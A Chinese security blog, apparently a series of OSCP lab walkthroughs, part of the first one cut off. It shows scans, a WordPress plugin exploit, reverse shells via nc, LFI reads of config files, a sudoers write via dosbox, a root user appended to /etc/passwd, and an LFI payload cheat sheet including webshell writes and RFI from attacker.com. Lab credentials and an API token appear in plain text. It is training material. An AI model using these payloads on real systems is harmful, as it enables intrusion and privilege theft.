135http://192.168.206.105/wordpress (Status: 301) [Size: 241] [--> http://192.168.206.105/wordpress/]
136http://192.168.206.105/license.txt (Status: 200) [Size: 19915]
137http://192.168.206.105/wp-includes (Status: 301) [Size: 243] [--> http://192.168.206.105/wp-includes/]
138http://192.168.206.105/readme.html (Status: 200) [Size: 7278]
139http://192.168.206.105/wp-trackback.php (Status: 200) [Size: 135]
140http://192.168.206.105/wp-admin (Status: 301) [Size: 240] [--> http://192.168.206.105/wp-admin/]
141http://192.168.206.105/xmlrpc.php (Status: 405) [Size: 42]
142^C

熟悉的Wordpress，找到登录入口

1# 简单版本
2wpscan --update --url http://192.168.206.105 -e u
3 
4# 复杂全插件扫描版本
5# 枚举插件和用户名
6wpscan --enumerate ap,t,u --api-token 6Chbzkayn13XcMOgzoDGA85OLpV5BbXhGQ55s8qz88g --plugins-detection aggressive --url http://192.168.206.105 
7# 爆破密码 很慢，作为最后的手段
8wpscan --usernames admin --passwords /usr/share/wordlists/rockyou.txt --url http://192.168.206.105

WP插件漏洞

虽然没有得到登录密码，但是扫描发现simple file list插件存在漏洞，搜索simple file list插件相关漏洞利用方法。

1searchsploit simple file list
2searchsploit -m php/webapps/48979.py

修改为kali的IP，端口改为原靶机就开放的端口，这里用的5000，虽然在一开始并未扫描出来，但是降速后是可以扫描出来的5000端口。

1rlwrap nc -lvnp 5000
2python 48979.py http://192.168.206.105

内网信息收集

查看配置文件得到数据库密码

1cat wp-config.php

数据库密码

commander CommanderKeenVorticons1990

把数据密码当作用户密码来直接复用，切换用户，也可以直接ssh登录代替当前的登录。

1su commander
2python3 -c 'import pty;pty.spawn("/bin/bash")'

拿到第一个flag 数据库中找不到更多的有用内容

1scp linpeas.sh commander@192.168.206.105:/tmp/linpeas.sh

上传小豌豆来找发现/usr/bin/dosbox 可以提权，上网站查找提权命令 https://gtfobins.github.io/gtfobins/dosbox/ 发现可以越权写入文件，把commander写成全sudo的即可。

1LFILE='/etc/sudoers' 
2/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit
3sudo -s

拿到第二个flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.159]
 B[靶机 
 192.168.206.105]
 C[http用户Shell]
 D[commonder用户账户密码]
 E[root]

 %% 路径关系
 A-->|扫描|B
 B-->|插件漏洞|C
 C-->|数据库密码泄露|D
 D-->|busybox提权漏洞|E

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C public;
 class D,E internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-20 14:25, 2025-08-20 15:25
 漏洞识别 :a2, after a1, 2025-08-20 16:40
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-08-20 17:12
 权限提升 :crit,b2, 2025-08-22 15:05, 15m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Snookums WP

Wed, 20 Aug 2025 10:57:24 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.238
3# 靶机地址
4192.168.236.58

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.58 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
 9sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
10# 扫描目录
11gobuster dir -e -u http://192.168.236.58 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.236.58/

扫描结果如下：

 1
 2┌──(kali㉿kali)-[~/Desktop]
 3└─$ echo $ports
 421,22,80,111,139,445,3306
 5
 6┌──(kali㉿kali)-[~/Desktop]
 7└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
 8Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:01 EDT
 9Nmap scan report for 192.168.236.58
 10Host is up (0.30s latency).
 11
 12PORT STATE SERVICE VERSION
 1321/tcp open ftp vsftpd 3.0.2
 1422/tcp open ssh OpenSSH 7.4 (protocol 2.0)
 15| ssh-hostkey:
 16| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
 17| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
 18|_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
 1980/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
 20|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
 21|_http-title: Simple PHP Photo Gallery
 22111/tcp open rpcbind
 23139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 24445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 253306/tcp open mysql MySQL (unauthorized)
 26Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 27Device type: general purpose|router
 28Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|5.X (97%), MikroTik RouterOS 7.X (89%)
 29OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
 30Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (91%), Linux 3.8 - 3.16 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (90%), Linux 4.15 (89%)
 31No exact OS matches for host (test conditions non-ideal).
 32Service Info: Host: SNOOKUMS; OS: Unix
 33
 34Host script results:
 35|_smb2-time: Protocol negotiation failed (SMB2)
 36
 37OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 38Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds
 39
 40
 41┌──(kali㉿kali)-[~/Desktop]
 42└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
 43Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:06 EDT
 44Nmap scan report for 192.168.236.58
 45Host is up (1.5s latency).
 46
 47PORT STATE SERVICE
 4821/tcp open ftp
 4922/tcp open ssh
 5080/tcp open http
 51| http-internal-ip-disclosure:
 52|_ Internal IP Leaked: 127.0.0.1
 53|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
 54| http-sql-injection:
 55| Possible sqli for queries:
 56| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 57| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 58| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 59| http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
 60| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 61| http://192.168.236.58:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
 62| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 63| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 64| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 65| http://192.168.236.58:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
 66| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 67| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 68| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 69| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 70| http://192.168.236.58:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
 71| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 72| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 73| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 74| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 75| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 76| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 77| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 78| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 79| http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
 80| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 81| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 82| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 83| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 84| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 85| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 86| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 87| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 88| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 89| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 90| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 91|_ http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 92|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 93| http-enum:
 94| /README.txt: Interesting, a readme.
 95| /css/: Potentially interesting folder w/ directory listing
 96| /icons/: Potentially interesting folder w/ directory listing
 97| /images/: Potentially interesting folder w/ directory listing
 98|_ /js/: Potentially interesting folder w/ directory listing
 99|_http-csrf: Couldn't find any CSRF vulnerabilities.
100|_http-trace: TRACE is enabled
101|_http-dombased-xss: Couldn't find any DOM based XSS.
102111/tcp open rpcbind
103139/tcp open netbios-ssn
104445/tcp open microsoft-ds
1053306/tcp open mysql
106
107Host script results:
108| smb-vuln-regsvc-dos:
109| VULNERABLE:
110| Service regsvc in Microsoft Windows systems vulnerable to denial of service
111| State: VULNERABLE
112| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
113| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
114| while working on smb-enum-sessions.
115|_
116|_smb-vuln-ms10-054: false
117|_smb-vuln-ms10-061: false
118| smb-vuln-cve2009-3103:
119| VULNERABLE:
120| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
121| State: VULNERABLE
122| IDs: CVE:CVE-2009-3103
123| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
124| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
125| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
126| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
127| aka "SMBv2 Negotiation Vulnerability."
128|
129| Disclosure date: 2009-09-08
130| References:
131| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
132|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
133
134Nmap done: 1 IP address (1 host up) scanned in 266.35 seconds
135
136http://192.168.236.58/index.php (Status: 200) [Size: 2730]
137http://192.168.236.58/images (Status: 301) [Size: 237] [--> http://192.168.236.58/images/]
138http://192.168.236.58/image.php (Status: 200) [Size: 1508]
139http://192.168.236.58/photos (Status: 301) [Size: 237] [--> http://192.168.236.58/photos/]
140http://192.168.236.58/css (Status: 301) [Size: 234] [--> http://192.168.236.58/css/]
141http://192.168.236.58/license.txt (Status: 200) [Size: 18511]
142http://192.168.236.58/db.php (Status: 200) [Size: 0]
143http://192.168.236.58/README.txt (Status: 200) [Size: 4041]
144http://192.168.236.58/js (Status: 301) [Size: 233] [--> http://192.168.236.58/js/]
145
146┌──(kali㉿kali)-[~/Desktop]
147└─$ whatweb http://192.168.236.58/
148http://192.168.236.58/ [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], Google-Analytics[UA-2196019-1], HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.236.58], JQuery[1.7.2], Lightbox, PHP[5.4.16], Script, Title[Simple PHP Photo Gallery], X-Powered-By[PHP/5.4.16]

80端口打开网页是一个相册，鼠标悬停在图片上可以在右下角看到图片的地址。，能判断有一个image文件夹。文件夹没有什么特别的发现。 Nmap的扫描结果发现有个README.txt文件，读取一下

 1==========================
 2 Simple PHP Photo Gallery
 3==========================
 4
 5Copyright John Caruso 2005-2008
 6https://sourceforge.net/projects/simplephpgal/
 7
 8
 9A) Embedded Gallery or Standalone
 10==================================
 11You can embed the gallery into existing pages or use it as a standalone page.
 12
 13To use it as a Standalone page, just follow the instructions in steps (B) and (C).
 14
 15To use it as an embedded Gallery in an existing page:
 161) Copy the the code from the embeddedGallery.php file (or just use an include("embeddedGallery.php") statement in your existing php file).
 172) Follow step (B) with the following modifications
 18 * B.1) The gallery title will not be taken from the folder name, but rather the config file. Make sure to uncomment the $galleryTitle = "title"; line and place your desired title in the quotes.
 19 * B.2) Do not include index.php when copying the files from the .zip file
 20 * C.2) Do not include index.php if you want to create your own index page. Just include the embeddedGallery.php file in your own script
 21
 22B) Steps to setup your photogallery.
 23====================================
 24
 251) Create a new folder with the name that you would like your gallery title to be.
 26 * use the underscore "_" for spaces (eg. My_Vacation)
 27 * you can only use characters that are allowable for folder names
 282) Put all the files contained in this .zip file into the folder you just created
 293) If they do not already exist, create two folders named 'phpGallery_thumbs' and 'phpGallery_images' inside your folder. You will need WRITE permissions on the phpGallery_thumbs directory.
 304) Put all of the photos that you want displayed in your gallery into the phpGallery_images folder
 31 * by default they will be displayed in alphabetical order. This can be modified in the phpGalleryConfig.php file by setting the $sortMode variable at the bottom of the file
 325) Upload your directory to your website.
 33 * The first time you view the gallery it will take some time to load because thumbnails are being generated (If the page times out and nothing is shown on the screen, refresh the page. You may need to do this several times if you have a lot of images)
 34
 35
 36C) For Multiple Photo Galleries
 37================================
 38If you want to create multiple photo galleries:
 39
 401) Create a folder with the name that you would like your gallery listing to have.
 41 * use the underscore "_" for spaces (eg. My_Galleries)
 42 * you can only use characters that are allowable for folder names
 432) Place the index.php, embeddedGallery.php and phpGalleryConfig.php files from this .zip file into the folder
 443) Do the steps in (A) for as many galleries as you want to display, and place them into the folder you created in the previous step
 45
 46
 47
 48D) Modifying the Style
 49=======================
 50Every element in the gallery script is attached to a CSS class.
 51
 52If you are using the gallery as an embedded gallery, copy and paste the CSS classes/elements from the phpGalleryStyle.css file and paste them into your current stylesheet. I have tried to make the names as unique as possible.
 53
 54If you are using the gallery as a standalone page, you can make your modifications directly to the phpGalleryStyle.css file.
 55
 56
 57
 58
 59
 60NOTE:
 61
 62i) Your webserver must have PHP version 3.0 or higher, and GD 2.0 or higher installed in order for the gallery software to work.
 63 To check this, create a php file with the line <?php phpinfo(); ?> and run it to see what modules are installed.
 64
 65ii) Should work for JPG, JPEG, PNG and GIF files (for both upper and lowercase file extensions)
 66
 67iii) Feel free to remove the copyright information (I agree it is quite ugly), under the condition that you aren't going to try to break what the copyright is intended to protect :)
 68
 69iv) Have fun and enjoy!
 70
 71Oh and if you don't mind, drop me a line at simplephpgallery@gmail.com with the URL to your website that you are using the gallery script on. I enjoy seeing how something I've done has helped out someone else! 
 72
 73---翻译
 74
 75好的，这是您提供的“Simple PHP Photo Gallery”文档的中文翻译（纯文字格式）：
 76
 77Simple PHP Photo Gallery
 78
 79
 80版权 John Caruso 2005-2008
 81https://sourceforge.net/projects/simplephpgal/
 82
 83A) 嵌入式图库或独立图库
 84
 85您可以将图库嵌入到现有页面中，或者将其用作独立页面。
 86
 87作为独立页面使用： 只需按照步骤 (B) 和 (C) 中的说明操作即可。
 88
 89作为嵌入式图库在现有页面中使用：
 90
 91 1. 复制 embeddedGallery.php 文件中的代码（或者直接在您现有的 PHP 文件中使用 include("embeddedGallery.php") 语句）。
 92 2. 按照步骤 (B) 操作，但需进行以下修改：
 93 B.1) 图库标题将不再取自文件夹名称，而是取自配置文件。请确保取消注释 $galleryTitle "title"; 这一行，并将您想要的标题放在引号内。
 94
 95 B.2) 从 .zip 文件中复制文件时，不要包含 index.php。
 96
 97 3. (C.2) 如果您想创建自己的索引页，不要包含 index.php。只需在您自己的脚本中包含 embeddedGallery.php 文件。
 98
 99B) 设置您的照片图库的步骤
100
1011. 创建一个新文件夹，名称即为您想要的图库标题。
102 使用下划线 "_" 表示空格（例如：My_Vacation）。
103
104 只能使用文件夹名称允许的字符。
105
1062. 将本 .zip 文件中包含的所有文件放入您刚刚创建的文件夹中。
1073. 如果不存在，在您的文件夹内创建两个名为 phpGallery_thumbs 和 phpGallery_images 的文件夹。您需要对 phpGallery_thumbs 目录具有写入 (WRITE) 权限。
1084. 将所有想要在图库中显示的照片放入 phpGallery_images 文件夹中。
109 默认情况下，它们将按字母顺序显示。可以通过修改 phpGalleryConfig.php 文件底部的 $sortMode 变量来更改此行为。
110
1115. 将您的目录上传到您的网站。
112 第一次查看图库时，加载可能需要一些时间，因为正在生成缩略图（如果页面超时且屏幕上没有任何显示，请刷新页面。如果您有很多图像，可能需要多次刷新）。
113
114C) 创建多个照片图库
115
116如果您想创建多个照片图库：
117
1181. 创建一个文件夹，名称即为您想要的图库列表标题。
119 使用下划线 "_" 表示空格（例如：My_Galleries）。
120
121 只能使用文件夹名称允许的字符。
122
1232. 将本 .zip 文件中的 index.php、embeddedGallery.php 和 phpGalleryConfig.php 文件放入此文件夹。
1243. 按照 (A) 部分的步骤操作，创建您想要显示的任意多个图库，并将它们放入上一步创建的文件夹中。
125
126D) 修改样式
127
128图库脚本中的每个元素都关联着一个 CSS 类。
129
130嵌入式图库： 复制 phpGalleryStyle.css 文件中的 CSS 类/元素，并将其粘贴到您当前的样式表中。我尽量使类名唯一。
131
132独立页面图库： 可以直接修改 phpGalleryStyle.css 文件。
133
134注意 (NOTE):
135
136i) 您的 Web 服务器必须安装 PHP 3.0 或更高版本以及 GD 2.0 或更高版本，图库软件才能工作。
137 要检查这一点，创建一个包含 <?php phpinfo(); ?> 行的 PHP 文件并运行它，查看安装了哪些模块。
138
139ii) 应支持 JPG, JPEG, PNG 和 GIF 文件（文件扩展名大小写均可）。
140
141iii) 可以自由删除版权信息（我同意它不太美观），条件是您不会试图破坏版权旨在保护的内容 :)
142
143iv) 祝您使用愉快！
144
145哦，如果您不介意，请发邮件到 simplephpgallery@gmail.com 告诉我您使用该图库脚本的网站 URL。我很高兴看到我做的东西帮助了别人！

发现这个PHP相册有用include的方式来展现图片，文字中 “或者直接在您现有的 PHP 文件中使用 include(“embeddedGallery.php”) 语句）“这一句说明了，存在文件包含。搜索一下网上这个文件包含的利用方法如下。

Question

文件包含漏洞有哪些用法

文件包含漏洞

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/var/www/html/db.php

1<?php
2define('DBHOST', '127.0.0.1');
3define('DBUSER', 'root');
4define('DBPASS', 'MalapropDoffUtilize1337');
5define('DBNAME', 'SimplePHPGal');
6?

得到数据库用户名和密码，观察端口发现3306端口打开，尝试登录发现不允许外部地址登录。

数据库密码

root MalapropDoffUtilize1337

Simple PHP Photo Gallery 漏洞

从Whatweb的结果中看，这是一个 Simple PHP Photo Gallery 的相册框架，搜索相关的漏洞发现有脚本可以利用。

https://github.com/beauknowstech/SimplePHPGal-RCE.py

1# 终端1
2rlwrap -cAr nc -nlvp 445
3# 终端2
4git clone https://github.com/beauknowstech/SimplePHPGal-RCE.py.git
5cd SimplePHPGal-RCE.py
6python3 SimplePHPGal-RCE.py http://192.168.236.58/ 192.168.45.238 445
7python -c 'import pty;pty.spawn("/bin/bash")'

注意这里最好是用靶机以及开放打开的端口，比如这里的445端口。

内网信息收集

现在就可以登录数据库了

解码两次密码得到：

username	password	解码	第二次解码
josh	VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0=	TW9iaWxpemVIaXNzU2VlZHRpbWU3NDc=	MobilizeHissSeedtime747
michael	U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==	SG9ja1N5ZG5leUNlcnRpZnkxMjM=	HockSydneyCertify123
serena	VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==	T3ZlcmFsbENyZXN0TGVhbjAwMA==	OverallCrestLean000

home文件夹下只有一个用户文件夹michael，尝试用数据库中得到的密码su一下用户。拿到第一个flag。搜一下常见的提权点，并未发现常见的可以提权的点查看是否还有其他可用的用户时发现passwd文件当前用户Micheal即可写入，那么直接写一个新用户，新的管理员用户即可。

1echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
2su root2

拿到第二个flag

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.238]
 B[靶机 
 192.168.236.58]
 C[获取数据库密码]
 D[获取apache终端]
 E[获取michael用户密码并登录]
 F[root]

 %% 路径关系
 A-->|扫描|B
 B-->|文件包含漏洞|C
 B-->|SimplePHPG漏洞|D
 C-->|数据库解码|E
 D-->E
 E-->|/etc/passwd权限配置不当|F
 


	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C,D public;
 class E,F internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-20 11:4, 2025-08-20 12:30
 漏洞识别 :a2, after a1, 2025-08-20 13:03
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-08-20 13:20
 权限提升 :crit,b2, after b1, 3m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 1m

文件包含漏洞（LFI/RFI）

文件包含漏洞（LFI/RFI）的核心在于利用动态文件加载机制，通过控制包含路径参数实现敏感文件读取或恶意代码执行。以下是常见利用方式及技术细节，按协议和场景分类整理：

📁 一、本地文件包含（LFI）基础利用

敏感文件读取
- 路径遍历：通过../跳转目录读取系统文件。
  - ?file=../../../../etc/passwd→ 泄露用户账户信息。
  - Windows 系统：?file=../../Windows/win.ini→ 获取系统配置。
- 空字节截断（PHP <5.3.4）：
  - ?file=../../../etc/passwd%00→ 绕过后缀限制（如.php）。
日志文件注入
- 污染日志：在请求头中注入恶意代码（如User-Agent: <?php system($_GET['cmd']);?>）。
- 包含日志：?file=/var/log/apache2/access.log&cmd=id→ 执行注入的代码。
Session 文件利用
- 注入恶意 Session：通过登录表单设置PHPSESSID=evil并提交username=<?php system('id');?>。
- 包含 Session 文件：?file=/tmp/sess_evil→ 执行代码。

🌐 二、伪协议高级利用

🔧 1. `php://filter`（源码泄露）

Base64 编码读取：避免 PHP 代码直接执行。
- ?file=php://filter/convert.base64-encode/resource=config.php→ 获取配置文件 Base64 编码内容。
编码绕过技巧：
- 多重过滤器：?file=php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php→ 绕过简单过滤。

⚡ 2. `php://input`（代码执行）

POST 请求执行代码：需allow_url_include=On。
- ?file=php://input+ POST Body：<?php system('id');?>→ 直接执行系统命令。

写入 Webshell：

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);?>'); ?>

通过包含触发写入。

📦 3. 压缩协议（绕过上传限制）

上传含恶意代码的shell.zip（内部含shell.php），重命名为image.jpg。
?file=zip:///path/to/image.jpg%23shell.php→ 解压并执行代码。
类似zip://，额外支持反序列化攻击。

💥 4. `data://`（直接代码执行）

嵌入 PHP 代码：需allow_url_include=On。
- ?file=data://text/plain,<?php phpinfo();?>→ 直接输出phpinfo。
Base64 编码绕过：
- ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+→ 执行编码后的代码。

🎯 三、远程文件包含（RFI）

远程加载恶意文件
- ?file=http://attacker.com/shell.txt→ 包含远程服务器上的 Webshell（需allow_url_include=On）。
- 绕过技巧：添加?或%23截断后缀：
  - ?file=http://attacker.com/shell.txt%23→ 忽略本地追加的后缀（如.php）。
结合 DNS 重绑定
- 使同一 URL 在不同时间解析到攻击者服务器和本地文件，绕过 IP 限制。

⚙️ 四、环境变量与临时文件

/proc/self/environ利用
- 通过User-Agent注入代码：
  - User-Agent: <?php system($_GET['cmd']);?>。
  - ?file=/proc/self/environ&cmd=id→ 执行注入命令。
临时文件包含
- 结合文件上传漏洞，包含上传的临时文件路径（如/tmp/phpXXXXXX）。

🛠️ 五、绕过过滤技巧

双写绕过：?file=....//....//etc/passwd→ 应对str_replace("../", "")过滤。
绝对路径绕过：?file=file:///etc/passwd→ 直接指定绝对路径。
长度截断：超长文件名（Windows >256字符，Linux >4096字符）自动截断后缀。

💎 总结

文件包含漏洞的利用核心在于控制输入路径和利用协议特性：

敏感信息泄露 → php://filter+ Base64 编码。
代码执行 → php://input/data://+ POST 代码注入。
绕过限制 → 压缩协议（zip:///phar://）或路径遍历技巧。防御需结合白名单验证、协议禁用（如allow_url_include=Off）和输入过滤 。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day26 Web漏洞-XSS跨站脚本

Tue, 05 Aug 2025 14:20:01 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

上一节补充核心知识点：Burp Suite 处理动态 Token 的流程

下文的 phpMyAdmin 替换为 DVWA 漏洞练习靶场为例子。

1. 问题分析

目标防护机制：
phpMyAdmin 登录表单包含动态生成的 token 和 set_session 值，每次请求都会变化，用于防止 CSRF 和暴力破解。
关键挑战：
直接爆破密码会因 Token/Session 不匹配失败（返回错误 Error: Token/Session mismatch）。调整DVWA靶场的安全设置为High然后打开 Brute Force 有个登录框，可以练习登录的漏洞。随便输入用户名密码抓包后查看发现是有token值的，当前的响应是200，是正常的。但是当放到重放器中再次发包后返回的结果就是302，这样的话似乎就没办法用Burp爆破密码了。因为token值每发一次就会变化一次。如果在浏览器直接刷新也会提示token过期的。

2. 解决方案：Burp Intruder 的宏（Macro）功能

核心思路：通过 Recursive Grep（递归提取） 从服务器响应中动态捕获 Token/Session 值，并自动注入到后续请求。

3. 配置步骤

Step 1: 设置攻击位置（Positions）

清除默认标记：点击 Clear § 移除 Burp 自动标记的位置。
手动标记关键参数（4个位置需动态更新）：
1. Cookie 中的 phpMyAdmin 值
  （示例：Cookie: phpMyAdmin=§动态值§）
2. POST 表单中的 set_session
  （示例：set_session=§动态值§）
3. 密码字段 pma_password
  （固定用户 root，爆破密码：pma_password=§密码字典§）
4. Token 字段 token
  （示例：token=§动态值§）教材中用的是phpmyadmin，这里用的DVWA一样的，在要爆破的字段上设置"节"符号§，点击 Add § 按钮即可添加。

Step 2: 配置 Payloads（递归提取动态值）

Payload Set 1 & 2（Session 值）
- 类型：Recursive Grep
- 提取规则：
  从响应中抓取 set_session 的隐藏字段值：
```
<input type="hidden" name="set_session" value="§提取值§" />
```
  配置定界符：
  - Start: name="set_session" value="
  - End: "
Payload Set 4（Token 值）
- 类型：Recursive Grep
- 提取规则：
  从响应中抓取 Token 值：
```
<input type="hidden" name="token" value="§提取值§" />
```
  配置定界符：
  - Start: name="token" value="
